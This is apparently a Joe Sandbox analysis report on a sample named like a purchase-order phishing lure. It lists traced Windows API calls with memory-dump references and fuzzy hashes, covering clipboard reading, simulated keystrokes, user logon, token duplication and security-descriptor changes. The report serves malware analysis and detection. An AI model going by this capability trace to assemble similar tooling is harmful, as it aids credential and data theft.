                                • FreeLibrary.KERNEL32(?,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154F6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: f06c731ea1d0295a420e8a1efd795d577c73adf9c90e477d90118cc40548df0d
                                • Instruction ID: c274e3cab27d9c4fe7ca6e658373c3cfeed37e84bc4eb7e34f6a84454f370eab
                                • Opcode Fuzzy Hash: f06c731ea1d0295a420e8a1efd795d577c73adf9c90e477d90118cc40548df0d
                                • Instruction Fuzzy Hash: 9FF03071105751CFDB389F6CD490856B7F4AF1431E324897FE5EA8A511C7319888DF50
                                APIs
                                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0019EE51,00213630,00000002), ref: 001BCD26
                                  • Part of subcall function 001BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,001BCD19,?,?,?), ref: 001BCC59
                                  • Part of subcall function 001BCC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,001BCD19,?,?,?,?,0019EE51,00213630,00000002), ref: 001BCC6E
                                  • Part of subcall function 001BCC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,001BCD19,?,?,?,?,0019EE51,00213630,00000002), ref: 001BCC7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$Pointer$Write
                                • String ID:
                                • API String ID: 3847668363-0
                                • Opcode ID: 3b46cf46b4c3d18e08ba69abad7954e8b323555b6a35ac55f584dcf7dce32c50
                                • Instruction ID: feb73a49d3786d98551e36be0d093f963c02924b456361ae21ea13679f0f6c76
                                • Opcode Fuzzy Hash: 3b46cf46b4c3d18e08ba69abad7954e8b323555b6a35ac55f584dcf7dce32c50
                                • Instruction Fuzzy Hash: 89E0397A400604EFC7219F8ADD408AABBF8FFD4260710852FE99682510D3B1AA54DBA0
                                APIs
                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00152DC4
                                  • Part of subcall function 00156B57: _wcslen.LIBCMT ref: 00156B6A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: LongNamePath_wcslen
                                • String ID:
                                • API String ID: 541455249-0
                                • Opcode ID: 63b820c59a015440930083b23cc156460eca80ee5d47d6f3796c1450b1e73343
                                • Instruction ID: 0f8d8b00ee095c2fad70037e07bc94a94d6d71952ed2b50350fbd9ea1d371ab0
                                • Opcode Fuzzy Hash: 63b820c59a015440930083b23cc156460eca80ee5d47d6f3796c1450b1e73343
                                • Instruction Fuzzy Hash: 1FE0CD726001245BCB1092989C06FEA77DDDFC8790F040071FD09D7248DA70ADC48590
                                APIs
                                  • Part of subcall function 00153837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00153908
                                  • Part of subcall function 0015D730: GetInputState.USER32 ref: 0015D807
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00152B6B
                                  • Part of subcall function 001530F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0015314E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                • String ID:
                                • API String ID: 3667716007-0
                                • Opcode ID: 78848761976f914fefd9f763706b0755548bcbdbb0700aebe9c0951066838599
                                • Instruction ID: 6a5e2ced6c320aa542ad8b84e63477d3500cb0dcd2ff9d8b2cef9be1383cd4d6
                                • Opcode Fuzzy Hash: 78848761976f914fefd9f763706b0755548bcbdbb0700aebe9c0951066838599
                                • Instruction Fuzzy Hash: 64E0262230024492C608BBB0B8528ADB7599BF1393F40153EF8768F1A3CF20459EC352
                                APIs
                                • CreateFileW.KERNELBASE(00000000,00000000,?,00190704,?,?,00000000,?,00190704,00000000,0000000C), ref: 001903B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 92ad80be1a8b5e84785cd9e18822406134445285d4fa554f582d6f6398a23406
                                • Instruction ID: 263ca8a7be3c85cdedb0e1741aa2d76239c49ba3c2e2e45523dbede234988dcb
                                • Opcode Fuzzy Hash: 92ad80be1a8b5e84785cd9e18822406134445285d4fa554f582d6f6398a23406
                                • Instruction Fuzzy Hash: A8D06C3204014DFBDF029F84DD46EDA3FAAFB48714F014000BE1856020C732E862AB91
                                APIs
                                • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00151CBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: InfoParametersSystem
                                • String ID:
                                • API String ID: 3098949447-0
                                • Opcode ID: b3970d8e762584551636f77641a773482374235680d34a3536d592eef430d3c5
                                • Instruction ID: 5095d367b59a5931935b5d184ef67e570825c68cac49f9b677528450d7295d32
                                • Opcode Fuzzy Hash: b3970d8e762584551636f77641a773482374235680d34a3536d592eef430d3c5
                                • Instruction Fuzzy Hash: 0AC09B35380345FFF23487C0BC4EF147755A75CB00F449001F609695E3C3A21471D690
                                APIs
                                  • Part of subcall function 00155745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0015949C,?,00008000), ref: 00155773
                                • GetLastError.KERNEL32(00000002,00000000), ref: 001C76DE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CreateErrorFileLast
                                • String ID:
                                • API String ID: 1214770103-0
                                • Opcode ID: 50fe5e2f6549a213938f9d27d8ce114564a5b67957587d819d0ca61c3b3fcb63
                                • Instruction ID: 3c01f7b87100c6e5047470e5d5a009fad584682f0d32c46d6e9139e1feb41262
                                • Opcode Fuzzy Hash: 50fe5e2f6549a213938f9d27d8ce114564a5b67957587d819d0ca61c3b3fcb63
                                • Instruction Fuzzy Hash: 98816A30608701DFCB14EF28C491B69B7E1AFA9315F04451DF8AA5B2A2DB70ED49CF92
                                APIs
                                • CloseHandle.KERNELBASE(?,?,00000000,001924E0), ref: 00156266
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: 5f9770a1e9a0d5798783402af04712fb0198edf1d06eab452319a6872e5c675a
                                • Instruction ID: 407ced465182b985a460cf311753b8876f8a6ef6fdd5986af88028dcb0242020
                                • Opcode Fuzzy Hash: 5f9770a1e9a0d5798783402af04712fb0198edf1d06eab452319a6872e5c675a
                                • Instruction Fuzzy Hash: 80E0B675400B01CFC3318F1AE804412FBF5FFE13623214A2ED8F69A660D3B0588A8F90
                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 036DF711
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction ID: d06016b1b26ff16bed0cf6a69704514374240fee6b475e8d81042ec33b03581f
                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction Fuzzy Hash: 6BE0E67494010DDFDB00EFB8D54D6DE7FB4EF04301F1001A1FD01D2280D6319D508A62
                                APIs
                                  • Part of subcall function 00169BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00169BB2
                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 001E961A
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001E965B
                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 001E969F
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001E96C9
                                • SendMessageW.USER32 ref: 001E96F2
                                • GetKeyState.USER32(00000011), ref: 001E978B
                                • GetKeyState.USER32(00000009), ref: 001E9798
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001E97AE
                                • GetKeyState.USER32(00000010), ref: 001E97B8
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001E97E9
                                • SendMessageW.USER32 ref: 001E9810
                                • SendMessageW.USER32(?,00001030,?,001E7E95), ref: 001E9918
                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 001E992E
                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 001E9941
                                • SetCapture.USER32(?), ref: 001E994A
                                • ClientToScreen.USER32(?,?), ref: 001E99AF
                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001E99BC
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001E99D6
                                • ReleaseCapture.USER32 ref: 001E99E1
                                • GetCursorPos.USER32(?), ref: 001E9A19
                                • ScreenToClient.USER32(?,?), ref: 001E9A26
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001E9A80
                                • SendMessageW.USER32 ref: 001E9AAE
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001E9AEB
                                • SendMessageW.USER32 ref: 001E9B1A
                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 001E9B3B
                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 001E9B4A
                                • GetCursorPos.USER32(?), ref: 001E9B68
                                • ScreenToClient.USER32(?,?), ref: 001E9B75
                                • GetParent.USER32(?), ref: 001E9B93
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 001E9BFA
                                • SendMessageW.USER32 ref: 001E9C2B
                                • ClientToScreen.USER32(?,?), ref: 001E9C84
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 001E9CB4
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 001E9CDE
                                • SendMessageW.USER32 ref: 001E9D01
                                • ClientToScreen.USER32(?,?), ref: 001E9D4E
                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 001E9D82
                                  • Part of subcall function 00169944: GetWindowLongW.USER32(?,000000EB), ref: 00169952
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E9E05
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                • String ID: @GUI_DRAGID$F$p#"
                                • API String ID: 3429851547-1047118953
                                • Opcode ID: 7c7c4c579d1bf95f24224205720e7e107deeda4b4aef068e47f0d70e960e33b0
                                • Instruction ID: 279d97150fe9a2c962686be5d7b86b5a0e154bd01ffcf9c16e3175b489333b5b
                                • Opcode Fuzzy Hash: 7c7c4c579d1bf95f24224205720e7e107deeda4b4aef068e47f0d70e960e33b0
                                • Instruction Fuzzy Hash: 91428C70604680AFD724CF66CC84EAEBBF5FF49310F14061AFA598B2A1D77198A5CF81
                                APIs
                                • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 001E48F3
                                • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 001E4908
                                • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 001E4927
                                • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 001E494B
                                • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 001E495C
                                • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 001E497B
                                • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 001E49AE
                                • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 001E49D4
                                • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 001E4A0F
                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001E4A56
                                • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 001E4A7E
                                • IsMenu.USER32(?), ref: 001E4A97
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E4AF2
                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001E4B20
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E4B94
                                • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 001E4BE3
                                • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 001E4C82
                                • wsprintfW.USER32 ref: 001E4CAE
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001E4CC9
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001E4CF1
                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001E4D13
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001E4D33
                                • GetWindowTextW.USER32(?,00000000,00000001), ref: 001E4D5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                • String ID: %d/%02d/%02d
                                • API String ID: 4054740463-328681919
                                • Opcode ID: a135c743406147cebc0bb08844d912ae0038f4028edfe287bd19977c81c8c6d5
                                • Instruction ID: 79083e14ba169be7842d394b5b2c23bfa05bba7b125f48832ccfb2d3e4092715
                                • Opcode Fuzzy Hash: a135c743406147cebc0bb08844d912ae0038f4028edfe287bd19977c81c8c6d5
                                • Instruction Fuzzy Hash: 9912F231A00684ABEB248F69DC49FAF7BF8EF49710F144129F916EB2E1D7749941CB50
                                APIs
                                • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0016F998
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001AF474
                                • IsIconic.USER32(00000000), ref: 001AF47D
                                • ShowWindow.USER32(00000000,00000009), ref: 001AF48A
                                • SetForegroundWindow.USER32(00000000), ref: 001AF494
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001AF4AA
                                • GetCurrentThreadId.KERNEL32 ref: 001AF4B1
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001AF4BD
                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 001AF4CE
                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 001AF4D6
                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 001AF4DE
                                • SetForegroundWindow.USER32(00000000), ref: 001AF4E1
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF4F6
                                • keybd_event.USER32(00000012,00000000), ref: 001AF501
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF50B
                                • keybd_event.USER32(00000012,00000000), ref: 001AF510
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF519
                                • keybd_event.USER32(00000012,00000000), ref: 001AF51E
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 001AF528
                                • keybd_event.USER32(00000012,00000000), ref: 001AF52D
                                • SetForegroundWindow.USER32(00000000), ref: 001AF530
                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 001AF557
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                • String ID: Shell_TrayWnd
                                • API String ID: 4125248594-2988720461
                                APIs
                                  • Part of subcall function 001B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001B170D
                                  • Part of subcall function 001B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001B173A
                                  • Part of subcall function 001B16C3: GetLastError.KERNEL32 ref: 001B174A
                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 001B1286
                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001B12A8
                                • CloseHandle.KERNEL32(?), ref: 001B12B9
                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001B12D1
                                • GetProcessWindowStation.USER32 ref: 001B12EA
                                • SetProcessWindowStation.USER32(00000000), ref: 001B12F4
                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001B1310
                                  • Part of subcall function 001B10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001B11FC), ref: 001B10D4
                                  • Part of subcall function 001B10BF: CloseHandle.KERNEL32(?,?,001B11FC), ref: 001B10E9
                                Similarity
                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                • String ID: $default$winsta0$Z!
                                • API String ID: 22674027-3215132610
                                APIs
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001B1114
                                  • Part of subcall function 001B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1120
                                  • Part of subcall function 001B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B112F
                                  • Part of subcall function 001B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1136
                                  • Part of subcall function 001B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001B114D
                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001B0BCC
                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001B0C00
                                • GetLengthSid.ADVAPI32(?), ref: 001B0C17
                                • GetAce.ADVAPI32(?,00000000,?), ref: 001B0C51
                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001B0C6D
                                • GetLengthSid.ADVAPI32(?), ref: 001B0C84
                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 001B0C8C
                                • HeapAlloc.KERNEL32(00000000), ref: 001B0C93
                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001B0CB4
                                • CopySid.ADVAPI32(00000000), ref: 001B0CBB
                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001B0CEA
                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001B0D0C
                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001B0D1E
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0D45
                                • HeapFree.KERNEL32(00000000), ref: 001B0D4C
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0D55
                                • HeapFree.KERNEL32(00000000), ref: 001B0D5C
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001B0D65
                                • HeapFree.KERNEL32(00000000), ref: 001B0D6C
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 001B0D78
                                • HeapFree.KERNEL32(00000000), ref: 001B0D7F
                                  • Part of subcall function 001B1193: GetProcessHeap.KERNEL32(00000008,001B0BB1,?,00000000,?,001B0BB1,?), ref: 001B11A1
                                  • Part of subcall function 001B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,001B0BB1,?), ref: 001B11A8
                                  • Part of subcall function 001B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,001B0BB1,?), ref: 001B11B7
                                Similarity
                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                • String ID:
                                • API String ID: 4175595110-0
                                APIs
                                • OpenClipboard.USER32(001ECC08), ref: 001CEB29
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 001CEB37
                                • GetClipboardData.USER32(0000000D), ref: 001CEB43
                                • CloseClipboard.USER32 ref: 001CEB4F
                                • GlobalLock.KERNEL32(00000000), ref: 001CEB87
                                • CloseClipboard.USER32 ref: 001CEB91
                                • GlobalUnlock.KERNEL32(00000000), ref: 001CEBBC
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 001CEBC9
                                • GetClipboardData.USER32(00000001), ref: 001CEBD1
                                • GlobalLock.KERNEL32(00000000), ref: 001CEBE2
                                • GlobalUnlock.KERNEL32(00000000), ref: 001CEC22
                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 001CEC38
                                • GetClipboardData.USER32(0000000F), ref: 001CEC44
                                • GlobalLock.KERNEL32(00000000), ref: 001CEC55
                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 001CEC77
                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001CEC94
                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 001CECD2
                                • GlobalUnlock.KERNEL32(00000000), ref: 001CECF3
                                • CountClipboardFormats.USER32 ref: 001CED14
                                • CloseClipboard.USER32 ref: 001CED59
                                Similarity
                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                • String ID:
                                • API String ID: 420908878-0
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 001C69BE
                                • FindClose.KERNEL32(00000000), ref: 001C6A12
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001C6A4E
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001C6A75
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001C6AB2
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001C6ADF
                                Similarity
                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                • API String ID: 3830820486-3289030164
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001C9663
                                • GetFileAttributesW.KERNEL32(?), ref: 001C96A1
                                • SetFileAttributesW.KERNEL32(?,?), ref: 001C96BB
